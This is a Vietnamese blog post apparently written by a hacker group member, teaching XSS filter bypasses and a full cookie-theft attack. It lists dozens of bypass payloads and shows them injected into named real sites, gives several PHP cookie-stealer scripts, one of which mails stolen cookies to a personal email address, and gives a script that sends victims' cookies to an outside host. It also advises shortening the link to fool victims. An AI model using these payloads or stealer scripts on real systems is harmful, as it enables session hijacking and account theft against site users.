Chủ Nhật, 31 tháng 3, 2013

[ XSS ] Kỹ thuật Bypass và phương pháp tấn công XSS

                       

                Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS

     7.       Kỹ Thuật Bypass

                1 số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:


       "><script>alert("Check By Soleil")</script>
 "><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
 '><script>alert("Check By Soleil ")</script>
 '><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
     <ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
 <ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
 "><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
 "><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
 '><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
 '><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
 </script><script>alert("Check By Soleil ")</script>
 </script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
 "/><script>alert("Check By Soleil ")</script>
 "/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
 '/><script>alert("Check By Soleil ")</script>
 '/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
 </SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
 </SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
 </SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
 </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
 ";alert("Check By Soleil ");"
 ";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
 ';alert("Check By Soleil ");'
 ';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
 ";alert("Check By Soleil ")
 ";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
 ';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))

           Trong đó: 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By Soleil” ở dạng char.

       Ví dụ:

    -          Attacker có thể chèn vào thanh tìm kiếm site http://www.hanoi.gov.vn    đoạn mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
      Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.




- http://m.aol.com/yp/search?query=Bars"><script>alert(/Check By Mr.Soleil VHB_Group/)</script>


http://tuoitre.vn/Tim-kiem/?page=1&keyword=%3C/script%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2867,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99%20%29%29%3C/SCRIPT%3E


      8.      Quá trình các bước thực hiện tấn công bằng XSS


       Bước 1: Tạo file Stealer.php để đánh cắp cookies

Nội dung của file Stealer.php như sau:

        <?php
       $cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("logs.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

-      $cookie = $HTTP_GET_VARS["cookie"];   // đánh cắp cookie từ địa chỉ hiện   tại url(stealer.php?cookie=x) và lưu trữ cookie trong biến  $cookie
-          $steal = fopen("cookiefile.txt", "a");   // Mở cookiefile để đính kèm các cookie được đánh cắp
-          fwrite($steal, $cookie ."\\n");  // Lưu lại những cookie được đánh cắp bên trong file
-          fclose($steal);  // Đóng lại cookiefile

     File này có nhiệm vụ đánh cắp cookies của victim và ghi thông tin lên file logs.txt

      Bước 2: Up các file lên host

UP lên host 2 file Stealer.php và logs.txt. Trong đó file Stealer.php có nội dung như trên và file logs.txt là file rỗng để lưu trữ toàn bộ thông tin của victim được gửi về thông qua mệnh lệnh được đưa ra từ file Stealer.php.
      Lưu ý, phải chmod file log.txt  về 777.
      Ngoài ra có thể sử dụng các đoạn mã sau  có thêm nhiều nhiệm vụ hơn cho file stealer.php


<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: <ENTER WEBSITE HERE>");
?>


<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

<?php
$cookie = $HTTP_GET_VARS["cookie"]; 
mail("ducdung.08clc@gmail.com", "Stolen Cookies", $cookie);
?>
// Đoạn mã này có tác dụng gửi cookies về email của attacker


       Bước 3: Khai thác lỗ hổng XSS

      -          Giả sử soleil up 2 file trên lên host của site http://www.vhbgroup.net , thì đoạn mã script ăn cắp cookies có dạng như sau:

     <script>location.href  =  'http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>

     -          Chèn đoạn mã đó vào site dính lỗi XSS là http://www.VulnerableSite.com ta được link tương tự như:

       http://www.VulnerableSite.com/index.php?search=<script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>

     -          Hoặc là chèn đoạn mã sau vào khung search, comment hay textbox nào đó, khi victim view site thì cookies sẽ được gửi về cho attacker <script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>

       Để đánh lừa được victim thì attacker sẽ làm ngắn đoạn url trên bằng cách sử dụng 1 số link sau:
http://tiny.cc/
http://www.shorturl.com/
http://tinyurl.com/
http://is.gd/
http://ow.ly/url/shorten-url
http://goo.gl/
http://mcaf.ee/
http://www.doiop.com/
https://addons.mozilla.org/vi/firefox/addon/copy-shorturl/       

       Sau khi đã đánh cắp đươc thông tin cookies của victim, có thể sử dụng tiên ích add-ons cookies manager  hoặc live http để login.

Người đăng: vào lúc 07:59

0 nhận xét:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)